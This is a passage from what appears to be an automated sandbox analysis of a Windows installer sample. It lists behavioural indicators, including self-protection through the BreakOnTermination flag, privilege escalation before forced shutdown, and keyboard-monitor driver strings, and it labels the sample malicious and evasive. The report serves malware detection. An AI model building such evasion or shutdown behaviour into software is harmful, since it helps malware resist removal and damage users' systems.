Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://ocsp.digicert.com0C
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://ocsp.digicert.com0H
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://ocsp.digicert.com0I
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://ocsp.digicert.com0X
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://www.digicert.com/CPS0
Source: cVyexkZjrG.tmp, 00000002.00000003.2141097682.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000007.00000002.2291790376.000000006CC88000.00000008.00000001.01000000.00000009.sdmp, hrsw.vbc.7.dr, update.vac.2.dr, update.vac.7.dr, 7zr.exe.7.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: cVyexkZjrG.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: cVyexkZjrG.exe, 00000000.00000003.2052689369.00000000029B0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.exe, 00000000.00000003.2053082904.000000007F74B000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000002.00000000.2054654528.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, cVyexkZjrG.tmp, 00000007.00000000.2144559370.000000000033D000.00000020.00000001.01000000.00000008.sdmp, cVyexkZjrG.tmp.6.dr, cVyexkZjrG.tmp.0.drString found in binary or memory: https://www.innosetup.com/
Source: cVyexkZjrG.exe, 00000000.00000003.2052689369.00000000029B0000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.exe, 00000000.00000003.2053082904.000000007F74B000.00000004.00001000.00020000.00000000.sdmp, cVyexkZjrG.tmp, 00000002.00000000.2054654528.0000000000C01000.00000020.00000001.01000000.00000004.sdmp, cVyexkZjrG.tmp, 00000007.00000000.2144559370.000000000033D000.00000020.00000001.01000000.00000008.sdmp, cVyexkZjrG.tmp.6.dr, cVyexkZjrG.tmp.0.drString found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpProcess information set: 01 00 00 00 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6CAD3886
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC55120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle,7_2_6CC55120
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6CAD3C62
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC55D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,7_2_6CC55D60
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6CAD3D18
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6CAD3D62
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6CAD39CF
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread,7_2_6CAD3A6A
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD1950: CreateFileA,DeviceIoControl,CloseHandle,7_2_6CAD1950
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor,7_2_6CAD4754
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAD47547_2_6CAD4754
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CAE4A277_2_6CAE4A27
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC518807_2_6CC51880
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC56A437_2_6CC56A43
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCB6CE07_2_6CCB6CE0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD24DE07_2_6CD24DE0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD06D107_2_6CD06D10
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCA2EC97_2_6CCA2EC9
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD0EEF07_2_6CD0EEF0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCDAEEF7_2_6CCDAEEF
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC88EA17_2_6CC88EA1
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD1C8D07_2_6CD1C8D0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCD48967_2_6CCD4896
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD248707_2_6CD24870
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCFE8107_2_6CCFE810
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD168207_2_6CD16820
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD269997_2_6CD26999
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD189507_2_6CD18950
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC889727_2_6CC88972
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD2A91A7_2_6CD2A91A
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD069007_2_6CD06900
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD1A9307_2_6CD1A930
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD14AA07_2_6CD14AA0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCE0A527_2_6CCE0A52
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD2AA007_2_6CD2AA00
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC90BCA7_2_6CC90BCA
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD1EBC07_2_6CD1EBC0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCFAB907_2_6CCFAB90
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCA0B667_2_6CCA0B66
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD0E4D07_2_6CD0E4D0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD144897_2_6CD14489
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCE84AC7_2_6CCE84AC
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD045D07_2_6CD045D0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD0C5807_2_6CD0C580
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD025807_2_6CD02580
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCF25217_2_6CCF2521
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD185207_2_6CD18520
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD246C07_2_6CD246C0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD1E6007_2_6CD1E600
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC8C7CF7_2_6CC8C7CF
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD267C07_2_6CD267C0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCEC7F37_2_6CCEC7F3
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD167A07_2_6CD167A0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD0E0E07_2_6CD0E0E0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD000207_2_6CD00020
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD1C2A07_2_6CD1C2A0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD182007_2_6CD18200
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD25D907_2_6CD25D90
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD03D507_2_6CD03D50
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCD7D437_2_6CCD7D43
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD09E807_2_6CD09E80
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCE1F117_2_6CCE1F11
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD178C87_2_6CD178C8
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCF589F7_2_6CCF589F
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD099F07_2_6CD099F0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCFDAD07_2_6CCFDAD0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD01AA07_2_6CD01AA0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCFFA507_2_6CCFFA50
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCA540A7_2_6CCA540A
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD0F5C07_2_6CD0F5C0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCCF5EC7_2_6CCCF5EC
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD096E07_2_6CD096E0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD1F6407_2_6CD1F640
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCFB6507_2_6CCFB650
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD237C07_2_6CD237C0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD297007_2_6CD29700
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CCA30927_2_6CCA3092
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD0F0507_2_6CD0F050
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD071F07_2_6CD071F0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD0D2807_2_6CD0D280
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD0D3807_2_6CD0D380
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD16AF07_2_6CD16AF0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CD137507_2_6CD13750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B781EC10_2_00B781EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BB81C010_2_00BB81C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BA425010_2_00BA4250
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BC824010_2_00BC8240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BCC3C010_2_00BCC3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BC04C810_2_00BC04C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BA865010_2_00BA8650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BAC95010_2_00BAC950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B8094310_2_00B80943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BA8C2010_2_00BA8C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BC4EA010_2_00BC4EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BC0E0010_2_00BC0E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B910AC10_2_00B910AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BBD08910_2_00BBD089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BB518010_2_00BB5180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BAD1D010_2_00BAD1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BC91C010_2_00BC91C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BC112010_2_00BC1120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BCD2C010_2_00BCD2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B953F310_2_00B953F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B353CF10_2_00B353CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B7D49610_2_00B7D496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BC54D010_2_00BC54D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BCD47010_2_00BCD470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B3157210_2_00B31572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BC155010_2_00BC1550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BBD6A010_2_00BBD6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B8965210_2_00B89652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B397CA10_2_00B397CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B4976610_2_00B49766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BCD9E010_2_00BCD9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B31AA110_2_00B31AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BB5E8010_2_00BB5E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BB5F8010_2_00BB5F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B4E00A10_2_00B4E00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BB22E010_2_00BB22E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BD230010_2_00BD2300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B9E49F10_2_00B9E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BB25F010_2_00BB25F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BAA6A010_2_00BAA6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BA66D010_2_00BA66D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BCE99010_2_00BCE990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BB2A8010_2_00BB2A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B8AB1110_2_00B8AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BB6CE010_2_00BB6CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BB70D010_2_00BB70D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BAB18010_2_00BAB180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B9B12110_2_00B9B121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BC720010_2_00BC7200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BBF3A010_2_00BBF3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B5B3E410_2_00B5B3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BCF3C010_2_00BCF3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BBF42010_2_00BBF420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BA741010_2_00BA7410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BCF59910_2_00BCF599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BC353010_2_00BC3530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BD351A10_2_00BD351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BAF50010_2_00BAF500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BD360110_2_00BD3601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BA379010_2_00BA3790
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BC77C010_2_00BC77C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B5F8E010_2_00B5F8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BAF91010_2_00BAF910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BB7AF010_2_00BB7AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B83AEF10_2_00B83AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B4BAC910_2_00B4BAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B4BC9210_2_00B4BC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BB7C5010_2_00BB7C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00BAFDF010_2_00BAFDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: String function: 6CC89240 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: String function: 6CD26F10 appears 728 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00BCFB10 appears 723 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00B31E40 appears 171 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00B328E3 appears 34 times
Source: cVyexkZjrG.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: cVyexkZjrG.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: cVyexkZjrG.tmp.0.drStatic PE information: Number of sections : 11 > 10
Source: cVyexkZjrG.tmp.6.drStatic PE information: Number of sections : 11 > 10
Source: cVyexkZjrG.exeStatic PE information: Number of sections : 11 > 10
Source: cVyexkZjrG.exe, 00000000.00000000.2050922147.0000000000639000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameklO2bH6zRBJ6nSx.exe vs cVyexkZjrG.exe
Source: cVyexkZjrG.exe, 00000000.00000003.2053082904.000000007FA4A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameklO2bH6zRBJ6nSx.exe vs cVyexkZjrG.exe
Source: cVyexkZjrG.exe, 00000000.00000003.2052689369.0000000002ACE000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameklO2bH6zRBJ6nSx.exe vs cVyexkZjrG.exe
Source: cVyexkZjrG.exeBinary or memory string: OriginalFileNameklO2bH6zRBJ6nSx.exe vs cVyexkZjrG.exe
Source: cVyexkZjrG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.13.drBinary string: \Device\TfSysMon
Source: tProtect.dll.13.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal88.evad.winEXE@135/33@0/0
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC55D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,7_2_6CC55D60
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B39313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,10_2_00B39313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B43D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00B43D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00B39252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,10_2_00B39252
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpCode function: 7_2_6CC55240 CreateToolhelp32Snapshot,CloseHandle,Process32NextW,Process32FirstW,7_2_6CC55240
Source: C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmpFile created: C:\Program Files (x86)\Windows NT\is-140D4.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1276:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6536:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5960:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1372:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6564:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1576:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3380:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6716:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1784:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5296:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6580:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5460:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5308:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7132:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2200:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3964:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4476:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5912:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5908:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1268:120:WilError_03
